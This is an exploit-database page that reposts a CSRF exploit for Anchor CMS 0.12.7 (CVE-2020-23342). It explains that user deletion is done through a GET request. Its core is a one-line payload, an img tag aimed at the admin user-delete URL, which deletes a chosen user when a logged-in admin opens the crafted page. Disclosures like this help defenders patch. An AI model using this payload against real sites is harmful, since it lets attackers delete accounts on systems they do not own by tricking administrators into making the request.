Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

Anchor CMS 0.12.7 CSRF (Delete user)
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage:
# Software Link:
# Version: 0.12.7
# CVE : CVE-2020-23342

the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html

<img src="http://target/anchor/index.php/admin/users/delete/21">
Where (21) is the user id .

When admin clicks on exploit.html link

User with id 21 will be deleted

Copyright ©2021 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.